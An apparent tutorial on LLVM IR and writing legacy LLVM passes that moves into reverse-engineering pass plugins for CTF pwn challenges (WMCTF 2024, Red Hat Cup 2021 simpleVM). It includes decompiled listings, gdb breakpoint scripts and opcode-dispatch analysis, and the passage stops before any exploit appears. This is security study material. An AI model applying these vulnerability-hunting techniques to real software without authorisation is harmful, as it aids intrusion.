LLVM
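LLVM is a compiler framework. As a framework, it is built from many functional modules, and both clang and lld can be regarded as components of LLVM. The figure below shows a simplified Clang/LLVM architecture.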

LLVM IR
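LLVM IR is LLVM's intermediate representation. Documentation: https://llvm.org/docs/LangRef.html
In LLVM, IR has three equivalent forms:
- .ll: the human-readable text form, sitting between a high-level language and assembly
- .bc: the unreadable binary form, called bitcode
- the in-memory form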
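Basic syntax
Global variable:
@global_variable = global i32 0
Stack variable:
%local_variable = alloca i32
Both names are actually pointers of type ptr, each pointing to an i32-sized region of memory. To operate on the values stored there, you must use the load and store instructions.
load reads a value. The following reads the i32 value that the pointer @global_variable points to and assigns it to the virtual register %1:
%1 = load i32, ptr @global_variable
store writes a value. The following writes the i32 value 1 into the memory that the global pointer @global_variable points to:
store i32 1, ptr @global_variable
Pointer type: ptr
C (this assumes y sits sizeof(int) bytes below x, which the compiler does not guarantee):
int x, y;
size_t address_of_x = (size_t)&x;
size_t address_of_y = address_of_x - sizeof(int);
int also_y = *(int *)address_of_y;
IR:
%x = alloca i32 ; %x is of type ptr, which is the address of variable x
%y = alloca i32 ; %y is of type ptr, which is the address of variable y
%address_of_x = ptrtoint ptr %x to i64
%address_of_y = sub i64 %address_of_x, 4
%also_y = inttoptr i64 %address_of_y to ptr ; %also_y is of type ptr, which is the address of variable y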
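The ptrtoint / sub / inttoptr sequence above can be mirrored in C with a layout that is actually guaranteed. The following is a minimal sketch, not the author's code: the helper names prev_int and read_first_via_integer are hypothetical, and an array is used so that the neighboring element is well defined instead of relying on stack layout. The integer-to-pointer round trip is implementation-defined, but behaves as shown on mainstream flat-address platforms.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical helper: given the address of an int that is not the first
 * element of an array, return the address of the element before it by
 * doing the arithmetic on an integer, as the IR does. */
int *prev_int(int *p) {
    assert(p != NULL);
    uintptr_t addr = (uintptr_t)p;   /* ptrtoint */
    addr -= sizeof(int);             /* sub      */
    return (int *)addr;              /* inttoptr */
}

/* Reads pair[0] starting from the address of pair[1]. */
int read_first_via_integer(void) {
    int pair[2] = {11, 22};
    return *prev_int(&pair[1]);
}
```

Calling read_first_via_integer() reads the first array element through the integer detour.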
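Aggregate types: arrays and structs
C's int[4] looks like this:
%a = alloca [4 x i32]
A similar syntax initializes an array:
@global_array = global [4 x i32] [i32 0, i32 1, i32 2, i32 3]
In particular, because a string is at bottom an array of characters, LLVM IR provides syntactic sugar for it:
@global_string = global [12 x i8] c"Hello world\00"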
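To see where the 12 in [12 x i8] comes from, the same string can be measured in C. This is a small illustrative sketch; the function name global_string_size is an assumption made for the example.

```c
#include <assert.h>
#include <stddef.h>

/* 11 visible characters plus the terminating NUL that the IR spells \00. */
static const char global_string[] = "Hello world";

size_t global_string_size(void) {
    /* The last array element is the NUL terminator. */
    assert(global_string[sizeof(global_string) - 1] == '\0');
    return sizeof(global_string);
}
```

The array size counts the terminator, which is why the IR type is one element longer than the visible text.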
A struct in C:
struct MyStruct {
    int x;
    char y;
};
The corresponding IR:
%MyStruct = type { i32, i8 }
Initializing a struct:
@global_structure = global %MyStruct { i32 1, i8 0 }
; or
@global_structure = global { i32, i8 } { i32 1, i8 0 }
getelementptr: accessing aggregates through a pointer
C:
struct MyStruct {
    int x;
    int y;
};

void foo(struct MyStruct *my_structs_ptr) {
    int my_y = my_structs_ptr[2].y;
}
IR:
%MyStruct = type { i32, i32 }

define void @foo(ptr %my_structs_ptr) {
    %my_y_in_stack = alloca i32
    %my_y_ptr = getelementptr %MyStruct, ptr %my_structs_ptr, i64 2, i32 1
    %my_y_val = load i32, ptr %my_y_ptr
    store i32 %my_y_val, ptr %my_y_in_stack
    ret void
}
The core is getelementptr and its four operands:
- %MyStruct: the type the pointer is treated as pointing to, which is the basis for the address computation
- ptr %my_structs_ptr: the pointer being indexed
- i64 2: take the element at offset 2, i.e. my_structs_ptr[2]
- i32 1: within that element, take the field at index 1, i.e. my_structs_ptr[2].y
getelementptr only computes an address; the load that follows performs the actual memory access.
More on how getelementptr works: https://llvm.org/docs/GetElementPtr.html
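The address arithmetic behind the getelementptr example can be written out in C. This is a minimal sketch under stated assumptions: the struct uses int32_t so the field sizes match i32 exactly, and the helper names gep_offset_of_y and gep_self_check are hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct MyStruct {
    int32_t x;
    int32_t y;
};

/* Byte offset that `getelementptr %MyStruct, ptr %p, i64 index, i32 1`
 * adds to %p: skip `index` whole structs, then step to field y. */
size_t gep_offset_of_y(size_t index) {
    return index * sizeof(struct MyStruct) + offsetof(struct MyStruct, y);
}

/* Reads arr[2].y through the manually computed byte offset. */
int32_t gep_self_check(void) {
    struct MyStruct arr[3] = {{0, 1}, {2, 3}, {4, 5}};
    const char *by_offset = (const char *)arr + gep_offset_of_y(2);
    assert(by_offset == (const char *)&arr[2].y);
    return *(const int32_t *)by_offset;
}
```

With two 4-byte fields, index 2 and field 1 give 2 * 8 + 4 = 20 bytes, the same address C computes for my_structs_ptr[2].y.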
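LLVM tools
opt optimizes programs at the IR level; its input and output are both LLVM IR.
llvm-link is the IR-level linker; it links IR files together.
llvm-as is the assembler for LLVM IR; it translates a .ll file into a .bc file. Within the LLVM project, the .ll form is called LLVM assembly.
llvm-dis is the opposite of llvm-as: the IR disassembler, which translates a .bc file into a .ll file.
clang: with -emit-llvm, combined with -S or -c, it emits a .ll or .bc file, so the Clang front end can be run separately from the LLVM back end.
.c -> .ll: clang -emit-llvm -S a.c -o a.ll
.c -> .bc: clang -emit-llvm -c a.c -o a.bc
.ll -> .bc: llvm-as a.ll -o a.bc
.bc -> .ll: llvm-dis a.bc -o a.ll
.bc -> .s: llc a.bc -o a.s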
LLVM PASS
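Next, what is an LLVM pass? Reading list:
http://www.aosabook.org/en/llvm.html
https://zhuanlan.zhihu.com/p/122522485
https://llvm.org/docs/WritingAnLLVMPass.html (official)
https://llvm.org/devmtg/2019-04/slides/Tutorial-Bridgers-LLVM_IR_tutorial.pdf
The LLVM pass framework is an important part of the LLVM system, because passes are where most of the interesting parts of the compiler live. Passes perform the transformations and optimizations that make up the compiler, they build the analysis results those transformations use, and they are above all a structuring technique for compiler code.
All LLVM passes (in the legacy pass manager described here) are subclasses of Pass and implement their functionality by overriding virtual methods inherited from Pass. Depending on how your pass works, you should inherit from ModulePass, CallGraphSCCPass, FunctionPass, LoopPass, or RegionPass. These classes give the system more information about what your pass does and how it can be combined with other passes. A key feature of the framework is that it schedules passes to run efficiently based on the constraints your pass meets (as indicated by the class it derives from).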
Hello world of passes
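Environment setup: just use the prebuilt packages.
$ sudo apt install llvm
$ sudo apt install clang
A specific version can be selected with sudo apt install llvm-x.y.
The code is walked through below.
The code uses the llvm namespace (using namespace llvm;), since the declarations in the LLVM headers live there.
namespace { opens an anonymous namespace. Anonymous namespaces are to C++ what the static keyword is to C (at global scope): whatever is declared inside is visible only in the current file.
Next, struct Hello : public FunctionPass { declares a Hello class that is a subclass of FunctionPass. A FunctionPass operates on one function at a time.
Then comes the pass identifier that LLVM uses to identify the pass, which lets LLVM avoid C++'s expensive runtime type information (RTTI):
static char ID;
Hello() : FunctionPass(ID) {}
A runOnFunction method is then declared, overriding the abstract virtual method inherited from FunctionPass.
bool runOnFunction(Function &F) override {
  errs() << "Hello: ";
  errs().write_escaped(F.getName()) << '\n';
  return false;
}
}; // end of struct Hello
}  // end of anonymous namespace
char Hello::ID = 0; initializes the pass ID. LLVM identifies a pass by the address of ID, so the initial value does not matter.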
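The point that the ID's address, not its value, identifies a pass can be illustrated outside LLVM. The sketch below is a plain C model with hypothetical names (hello_id, other_id, same_pass); it does not use LLVM's own registry code.

```c
#include <assert.h>
#include <stddef.h>

/* Two hypothetical pass IDs; both hold 0, as in `char Hello::ID = 0;`. */
static char hello_id = 0;
static char other_id = 0;

const void *hello_pass_id(void) { return &hello_id; }
const void *other_pass_id(void) { return &other_id; }

/* A pass is identified by where its ID lives, not by what it contains. */
int same_pass(const void *a, const void *b) {
    assert(a != NULL && b != NULL);
    return a == b;
}
```

Both variables store the same value, yet same_pass tells them apart because distinct objects have distinct addresses.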
Finally the Hello class is registered, giving it the command-line argument "hello" and the name "Hello World Pass". The last two arguments describe its behavior: if a pass walks the CFG without modifying it, the third argument is set to true; if a pass is an analysis pass, such as the dominator tree pass, the fourth argument is set to true.
static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);
The complete code follows. runOnFunction is invoked for each function in the IR and prints the function's name.
#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/Support/raw_ostream.h"

#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"

using namespace llvm;

namespace {
struct Hello : public FunctionPass {
  static char ID;
  Hello() : FunctionPass(ID) {}

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    return false;
  }
}; // end of struct Hello
}  // end of anonymous namespace

char Hello::ID = 0;
static RegisterPass<Hello> X("hello", "Hello World Pass",
                             false /* Only looks at CFG */,
                             false /* Analysis Pass */);

static RegisterStandardPasses Y(
    PassManagerBuilder::EP_EarlyAsPossible,
    [](const PassManagerBuilder &Builder,
       legacy::PassManagerBase &PM) { PM.add(new Hello()); });
Compile:
clang `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared Hello.cpp -o LLVMHello.so `llvm-config --ldflags`
This produces LLVMHello.so.
The opt command can now run the pass over an LLVM program. Because the pass was registered with RegisterPass, opt can reach it as soon as the shared object is loaded.
Now write any small program:
#include <stdio.h>
#include <stdlib.h>

int a() { return 0; }
int b() { return 0; }
int c() { return 0; }

int main() {
    printf("1!\n");
    return 0;
}
Compile it to a .ll file with clang:
clang -emit-llvm -S main.c -o main.ll
; ModuleID = 'main.c'
source_filename = "main.c"
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"

@.str = private unnamed_addr constant [4 x i8] c"1!\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define i32 @a() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @b() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @c() #0 {
  ret i32 0
}

; Function Attrs: noinline nounwind optnone uwtable
define i32 @main() #0 {
  %1 = alloca i32, align 4
  store i32 0, i32* %1, align 4
  %2 = call i32 (i8*, ...) @printf(i8* getelementptr inbounds ([4 x i8], [4 x i8]* @.str, i32 0, i32 0))
  ret i32 0
}

declare i32 @printf(i8*, ...) #1

attributes #0 = { noinline nounwind optnone uwtable "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-jump-tables"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }
attributes #1 = { "correctly-rounded-divide-sqrt-fp-math"="false" "disable-tail-calls"="false" "less-precise-fpmad"="false" "no-frame-pointer-elim"="true" "no-frame-pointer-elim-non-leaf" "no-infs-fp-math"="false" "no-nans-fp-math"="false" "no-signed-zeros-fp-math"="false" "no-trapping-math"="false" "stack-protector-buffer-size"="8" "target-cpu"="x86-64" "target-features"="+fxsr,+mmx,+sse,+sse2,+x87" "unsafe-fp-math"="false" "use-soft-float"="false" }

!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 6.0.0-1ubuntu2 (tags/RELEASE_600/final)"}
Run it: the pass visits the IR and prints the name of every function.
ayoung@ubuntu:~/pwn/llvm/eg$ opt -load ./LLVMHello.so -hello ./main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
Hello: b
Hello: c
Hello: main
Modified Hello world
Environment: Ubuntu 22.04
// Hello.cpp
#include "llvm/Pass.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/Constants.h"
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Instructions.h"
#include "llvm/Support/raw_ostream.h"
#include "llvm/IR/LegacyPassManager.h"
#include "llvm/Transforms/IPO/PassManagerBuilder.h"

using namespace llvm;

namespace {
struct Hello : public FunctionPass {
  static char ID;
  Hello() : FunctionPass(ID) {}

  bool runOnFunction(Function &F) override {
    errs() << "Hello: ";
    errs().write_escaped(F.getName()) << '\n';
    // Walk every basic block of the function, then every instruction in it.
    SymbolTableList<BasicBlock>::const_iterator bbEnd = F.end();
    for (SymbolTableList<BasicBlock>::const_iterator bbIter = F.begin(); bbIter != bbEnd; ++bbIter) {
      SymbolTableList<Instruction>::const_iterator instIter = bbIter->begin();
      SymbolTableList<Instruction>::const_iterator instEnd = bbIter->end();
      for (; instIter != instEnd; ++instIter) {
        errs() << "OpcodeName = " << instIter->getOpcodeName()
               << " NumOperands = " << instIter->getNumOperands() << "\n";
        // 56 is the opcode of call in the LLVM version used here;
        // the value differs between LLVM versions.
        if (instIter->getOpcode() == 56) {
          if (const CallInst *call_inst = dyn_cast<CallInst>(instIter)) {
            // getCalledFunction() returns null for indirect calls;
            // this code assumes direct calls only.
            errs() << call_inst->getCalledFunction()->getName() << "\n";
            // The last operand of a call is the callee, so stop before it.
            for (int i = 0; i < instIter->getNumOperands() - 1; i++) {
              if (isa<ConstantInt>(call_inst->getOperand(i))) {
                errs() << "ConstantInt " << i << " = "
                       << dyn_cast<ConstantInt>(call_inst->getArgOperand(i))->getZExtValue() << "\n";
              }
              if (isa<StoreInst>(call_inst->getOperand(i))) {
                errs() << "StoreInst " << i << " = "
                       << dyn_cast<StoreInst>(call_inst->getArgOperand(i))->getValueOperand() << "\n";
              }
            }
          }
        }
      }
    }
    return false;
  }
};
}

char Hello::ID = 0;

// Register for opt
static RegisterPass<Hello> X("Hello", "Hello World Pass");

// Register for clang
static RegisterStandardPasses Y(PassManagerBuilder::EP_EarlyAsPossible,
  [](const PassManagerBuilder &Builder, legacy::PassManagerBase &PM) {
    PM.add(new Hello());
  });
Compile (if headers are missing, use locate or find to track them down and add the include paths):
clang -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ `llvm-config --cxxflags` -Wl,-znodelete -fno-rtti -fPIC -shared mm.cpp -o LLVMHello.so `llvm-config --ldflags`
Run (using the exp from the WMCTF 2024 LLVM pass challenge):
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./opt -load ./LLVMHello.so -Hello -enable-new-pm=0 main.ll
WARNING: You're attempting to print out a bitcode file.
This is inadvisable as it may cause display problems. If
you REALLY want to taste LLVM bitcode first-hand, you
can force output with the `-f' option.

Hello: a
OpcodeName = alloca NumOperands = 1
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_OPEN
OpcodeName = store NumOperands = 2
OpcodeName = call NumOperands = 2
WMCTF_MMAP
ConstantInt 0 = 30864
OpcodeName = call NumOperands = 2
WMCTF_READ
ConstantInt 0 = 26214
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
WMCTF_WRITE
OpcodeName = ret NumOperands = 0
Hello: b
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
a
OpcodeName = ret NumOperands = 0
Hello: c
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
b
OpcodeName = ret NumOperands = 0
Hello: d
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
c
OpcodeName = ret NumOperands = 0
Hello: e
OpcodeName = alloca NumOperands = 1
OpcodeName = store NumOperands = 2
OpcodeName = load NumOperands = 1
OpcodeName = call NumOperands = 2
d
OpcodeName = ret NumOperands = 0
Static analysis
__int64 __fastcall GLOBAL__sub_I_Hello_cpp(llvm::PassRegistry *a1)
{
  __int64 PassRegistry; // rax
  __int64 result; // rax
  _BYTE v3[16]; // [rsp+0h] [rbp-28h] BYREF
  __m128i v4; // [rsp+10h] [rbp-18h]

  X = "Hello World Pass";
  qword_3088 = 16LL;
  qword_3090 = "hello";
  qword_3098 = 5LL;
  qword_30A0 = &`anonymous namespace'::Hello::ID;
  word_30A8 = 0;
  byte_30AA = 0;
  xmmword_30B0 = 0LL;
  qword_30C0 = 0LL;
  qword_30C8 = llvm::callDefaultCtor<`anonymous namespace'::Hello>;
  PassRegistry = llvm::PassRegistry::getPassRegistry(a1);
  llvm::PassRegistry::registerPass(PassRegistry, &X, 0LL);
  __cxa_atexit(llvm::PassInfo::~PassInfo, &X, &_dso_handle);
  v4 = _mm_unpacklo_epi64(
         std::_Function_base::_Base_manager<$_0>::_M_manager,
         std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke);
  result = llvm::PassManagerBuilder::addGlobalExtension(0LL, v3);
  if ( v4.m128i_i64[0] )
    return (v4.m128i_i64[0])(v3, v3, 3LL);
  return result;
}
Double-click llvm::callDefaultCtor<`anonymous namespace'::Hello>:
__int64 llvm::callDefaultCtor<`anonymous namespace'::Hello>()
{
  __int64 result; // rax

  result = operator new(0x20uLL);
  *(result + 8) = 0LL;
  *(result + 16) = &`anonymous namespace'::Hello::ID;
  *(result + 24) = 3;
  *result = off_2D38;
  return result;
}
Then double-click the pointer off_2D38 at the bottom to reach the vtable. The last entry of the vtable, runOnFunction, is the runOnFunction method overridden in the LLVM pass.
.data.rel.ro:0000000000002D38 off_2D38 dq offset _ZN4llvm4PassD2Ev
.data.rel.ro:0000000000002D38     ; DATA XREF: llvm::callDefaultCtor<`anonymous namespace'::Hello>(void)+25↑o
.data.rel.ro:0000000000002D38     ; std::_Function_handler<void ()(llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &),$_0>::_M_invoke(std::_Any_data const&,llvm::PassManagerBuilder const&,llvm::legacy::PassManagerBase &)+32↑o
.data.rel.ro:0000000000002D38     ; llvm::Pass::~Pass()
.data.rel.ro:0000000000002D40 dq offset _ZN12_GLOBAL__N_15HelloD0Ev ; `anonymous namespace'::Hello::~Hello()
.data.rel.ro:0000000000002D48 dq offset _ZNK4llvm4Pass11getPassNameEv ; llvm::Pass::getPassName(void)
.data.rel.ro:0000000000002D50 dq offset _ZN4llvm4Pass16doInitializationERNS_6ModuleE ; llvm::Pass::doInitialization(llvm::Module &)
.data.rel.ro:0000000000002D58 dq offset _ZN4llvm4Pass14doFinalizationERNS_6ModuleE ; llvm::Pass::doFinalization(llvm::Module &)
.data.rel.ro:0000000000002D60 dq offset _ZNK4llvm4Pass5printERNS_11raw_ostreamEPKNS_6ModuleE ; llvm::Pass::print(llvm::raw_ostream &,llvm::Module const*)
.data.rel.ro:0000000000002D68 dq offset _ZNK4llvm12FunctionPass17createPrinterPassERNS_11raw_ostreamERKNSt7__cxx1112basic_stringIcSt11char_traitsIcESaIcEEE ; llvm::FunctionPass::createPrinterPass(llvm::raw_ostream &,std::__cxx11::basic_string<char,std::char_traits<char>,std::allocator<char>> const&)
.data.rel.ro:0000000000002D70 dq offset _ZN4llvm12FunctionPass17assignPassManagerERNS_7PMStackENS_15PassManagerTypeE ; llvm::FunctionPass::assignPassManager(llvm::PMStack &,llvm::PassManagerType)
.data.rel.ro:0000000000002D78 dq offset _ZN4llvm4Pass18preparePassManagerERNS_7PMStackE ; llvm::Pass::preparePassManager(llvm::PMStack &)
.data.rel.ro:0000000000002D80 dq offset _ZNK4llvm12FunctionPass27getPotentialPassManagerTypeEv ; llvm::FunctionPass::getPotentialPassManagerType(void)
.data.rel.ro:0000000000002D88 dq offset _ZNK4llvm4Pass16getAnalysisUsageERNS_13AnalysisUsageE ; llvm::Pass::getAnalysisUsage(llvm::AnalysisUsage &)
.data.rel.ro:0000000000002D90 dq offset _ZN4llvm4Pass13releaseMemoryEv ; llvm::Pass::releaseMemory(void)
.data.rel.ro:0000000000002D98 dq offset _ZN4llvm4Pass26getAdjustedAnalysisPointerEPKv ; llvm::Pass::getAdjustedAnalysisPointer(void const*)
.data.rel.ro:0000000000002DA0 dq offset _ZN4llvm4Pass18getAsImmutablePassEv ; llvm::Pass::getAsImmutablePass(void)
.data.rel.ro:0000000000002DA8 dq offset _ZN4llvm4Pass18getAsPMDataManagerEv ; llvm::Pass::getAsPMDataManager(void)
.data.rel.ro:0000000000002DB0 dq offset _ZNK4llvm4Pass14verifyAnalysisEv ; llvm::Pass::verifyAnalysis(void)
.data.rel.ro:0000000000002DB8 dq offset _ZN4llvm4Pass17dumpPassStructureEj ; llvm::Pass::dumpPassStructure(uint)
.data.rel.ro:0000000000002DC0 dq offset _ZN12_GLOBAL__N_15Hello13runOnFunctionERN4llvm8FunctionE ; `anonymous namespace'::Hello::runOnFunction(llvm::Function &)
.data.rel.ro:0000000000002DC0 _data_rel_ro ends
Following that entry shows the body of the overridden method:
__int64 __fastcall `anonymous namespace'::Hello::runOnFunction(llvm *a1, llvm::Value *a2)
{
  llvm *v2; // rax
  __int64 v3; // rcx
  __int64 v4; // rbx
  __int64 Name; // rax
  __int64 v6; // rdx
  llvm::raw_ostream *v7; // rax
  _BYTE *v8; // rcx

  v2 = llvm::errs(a1);
  v3 = *(v2 + 3);
  if ( (*(v2 + 2) - v3) > 6 )
  {
    *(v3 + 6) = 32;
    *(v3 + 4) = 14959;
    *v3 = 1819043144;
    *(v2 + 3) += 7LL;
  }
  else
  {
    a1 = v2;
    llvm::raw_ostream::write(v2, "Hello: ", 7uLL);
  }
  v4 = llvm::errs(a1);
  Name = llvm::Value::getName(a2);
  v7 = llvm::raw_ostream::write_escaped(v4, Name, v6, 0LL);
  v8 = *(v7 + 3);
  if ( v8 >= *(v7 + 2) )
  {
    llvm::raw_ostream::write(v7, 0xAu);
  }
  else
  {
    *(v7 + 3) = v8 + 1;
    *v8 = 10;
  }
  return 0LL;
}
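Dynamic debugging
The official documentation also describes how to debug a pass with gdb.
First start gdb on the opt process:
gdb opt
opt carries a lot of debug information, so loading takes a while. Since we cannot set a breakpoint in our pass yet (the shared object is not loaded until run time), we have to run the process and make it stop after the shared object is loaded but before the pass is invoked. The simplest way is to set a breakpoint in PassManager::run and then run the process with the desired arguments. In the arguments below, -hello corresponds to the first argument given when the class was registered in the loaded pass file.
Reading symbols from opt...(no debugging symbols found)...done.
pwndbg> b PassManager::run
Breakpoint 1 at 0x9be40
pwndbg> set args -load ./LLVMHello.so -hello ./main.ll
pwndbg> show args
Argument list to give program being debugged when it is started is "-load ./LLVMHello.so -hello ./main.ll".
pwndbg> r
Once opt stops in PassManager::run, you are free to set breakpoints in the pass and debug it.
Debug script debug.sh:
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat debug.sh
gdb opt -x "a.gdb"
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ cat a.gdb
set args -load ./WMCTF.so -WMCTF -enable-new-pm=0 main.ll
b PassManager::run
r
vmmap WMCTF
#b *(0x7ffff14c6000+0xd3cd)
b *(0x7ffff14c6000+0xD547)
b *0x7ffff14d360e
c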
Aside: writing a program that emits IR
Environment: Ubuntu 22.04
// HelloGlobalVariable.cpp
#include "llvm/IR/BasicBlock.h"
#include "llvm/IR/Function.h"
#include "llvm/IR/GlobalVariable.h"
#include "llvm/IR/IRBuilder.h"
#include "llvm/IR/LLVMContext.h"
#include "llvm/IR/Module.h"
#include "llvm/IR/Verifier.h"

using namespace llvm;

int main(int argc, char* argv[]) {
  LLVMContext context;
  IRBuilder<> builder(context);

  // Create a module
  Module* module = new Module("HelloModule", context);

  // Add a global variable
  module->getOrInsertGlobal("helloGlobalVariable", Type::getInt32Ty(context));
  GlobalVariable* globalVariable = module->getNamedGlobal("helloGlobalVariable");
  globalVariable->setLinkage(GlobalValue::CommonLinkage);
  globalVariable->setAlignment(MaybeAlign(4));

  // Add a function
  Type* voidType = Type::getVoidTy(context);
  FunctionType* functionType = FunctionType::get(voidType, false);
  Function* function = Function::Create(functionType, GlobalValue::ExternalLinkage, "HelloFunction", module);

  // Create a block
  BasicBlock* block = BasicBlock::Create(context, "entry", function);
  builder.SetInsertPoint(block);

  // Print the IR
  verifyFunction(*function);
  module->print(outs(), nullptr);

  return 0;
}
Compile:
clang++ -I/usr/include/c++/11/ -I/usr/include/x86_64-linux-gnu/c++/11/ -L/usr/lib/gcc/x86_64-linux-gnu/11/ -w -o HelloGlobalVariable `llvm-config --cxxflags --ldflags --system-libs --libs core` HelloGlobalVariable.cpp
Output (the listing names the module TriggerModule and contains different globals, so it was evidently captured from a different variant of the program than the source above):
ayoung@ay:~/wmctf/babysigin_e8127f4135702e8eee95bf1471f53a04/bin$ ./HelloGlobalVariable
; ModuleID = 'TriggerModule'
source_filename = "TriggerModule"

@triggerString.addr = private constant [15 x i8] c"Trigger String\00"
@globalTriggerVariable = private global i8* getelementptr inbounds ([15 x i8], [15 x i8]* @triggerString.addr, i32 0, i32 0), align 4

declare void @targetFunction()

define void @HelloFunction() {
entry:
  %loadTrigger = load i8*, i8** @globalTriggerVariable, align 8
  store i8* %loadTrigger, [15 x i8]* @triggerString.addr, align 8
  call void @targetFunction()
  ret void
}
Example challenge
Red Hat Cup 2021: simpleVM
Start by locating runOnFunction, since custom behavior is usually implemented by overriding it. Binaries built from LLVM passes all have a similar layout, so you can search your way to the vtable; its last entry is runOnFunction.
The function checks the name of each function (llvm::Value::getName): if the name is o0o0o0o0, it calls sub_6AC0 for further processing.
__int64 __fastcall sub_6830(__int64 a1, llvm::Value *a2)
{
  __int64 v2; // rdx
  bool v4; // [rsp+7h] [rbp-119h]
  size_t v5; // [rsp+10h] [rbp-110h]
  const void *Name; // [rsp+28h] [rbp-F8h]
  __int64 v7; // [rsp+30h] [rbp-F0h]
  int v8; // [rsp+94h] [rbp-8Ch]

  Name = llvm::Value::getName(a2);
  v7 = v2;
  if ( "o0o0o0o0" )
    v5 = strlen("o0o0o0o0");
  else
    v5 = 0LL;
  v4 = 0;
  if ( v7 == v5 )
  {
    if ( v5 )
      v8 = memcmp(Name, "o0o0o0o0", v5);
    else
      v8 = 0;
    v4 = v8 == 0;
  }
  if ( v4 )
    sub_6AC0(a1, a2);
  return 0LL;
}
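The decompiled check above is the inlined form of comparing a (pointer, length) name against a string literal: lengths first, then bytes. A minimal C sketch of that logic follows; the function name name_equals is hypothetical, and the name data is not assumed to be NUL-terminated.

```c
#include <assert.h>
#include <string.h>

/* name/len model the (pointer, length) pair that getName() returns. */
int name_equals(const char *name, size_t len, const char *literal) {
    assert(name != NULL && literal != NULL);
    size_t lit_len = strlen(literal);
    if (len != lit_len)
        return 0;   /* different lengths can never match */
    /* Equal lengths: compare the bytes (nothing to compare if empty). */
    return lit_len == 0 || memcmp(name, literal, lit_len) == 0;
}
```

Because the length is compared first, a function named o0o0o0o0_x does not match, while only its first 8 bytes would.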
llvm::Function::begin and llvm::Function::end return iterators to the start and the end of the function's list of BasicBlocks. The loop walks every basic block of the o0o0o0o0 function in the IR and hands each one to sub_6B80 for further processing.
unsigned __int64 __fastcall sub_6AC0(__int64 a1, llvm::Function *a2)
{
  llvm::BasicBlock *v3; // [rsp+20h] [rbp-30h]
  __int64 v4; // [rsp+38h] [rbp-18h] BYREF
  __int64 v5[2]; // [rsp+40h] [rbp-10h] BYREF

  v5[1] = __readfsqword(0x28u);
  v5[0] = llvm::Function::begin(a2);
  while ( 1 )
  {
    v4 = llvm::Function::end(a2);
    if ( (llvm::operator!=(v5, &v4) & 1) == 0 )
      break;
    v3 = llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator*(v5);
    sub_6B80(a1, v3);
    llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::BasicBlock,false,false,void>,false,false>::operator++(
      v5,
      0LL);
  }
  return __readfsqword(0x28u);
}
sub_6B80 walks the instructions in a basic block and matches them against the supported operations, much like a VM implementing its instruction set.
It starts with a loop; part of it is excerpted below. llvm::Instruction::getOpcode returns the instruction's opcode, which must be 55 for the later logic to run. The opcode values are defined in /include/llvm/IR/Instruction.def, where in this LLVM version 55 corresponds to call:
HANDLE_OTHER_INST(55, Call , CallInst ) // Call a function
So the code defines operations for calls to functions named pop, push, store, load, add, and min:
v39[1] = __readfsqword(0x28u);
v39[0] = llvm::BasicBlock::begin(a2);
while ( 1 )
{
  v38 = llvm::BasicBlock::end(a2);
  if ( (llvm::operator!=(v39, &v38) & 1) == 0 )
    break;
  v36 = llvm::dyn_cast<llvm::Instruction,llvm::ilist_iterator<llvm::ilist_detail::node_options<llvm::Instruction,false,false,void>,false,false>>(v39);
  if ( llvm::Instruction::getOpcode(v36) == 55 )
  {
    v35 = llvm::dyn_cast<llvm::CallInst,llvm::Instruction>(v36);
    if ( v35 )
    {
      s1 = malloc(0x20uLL);
      CalledFunction = llvm::CallBase::getCalledFunction(v35);
      Name = llvm::Value::getName(CalledFunction);
      *s1 = *Name;
      *(s1 + 1) = Name[1];
      *(s1 + 2) = Name[2];
      *(s1 + 3) = Name[3];
      if ( !strcmp(s1, "pop") )
        ...
      else if ( !strcmp(s1, "push") )
        ...
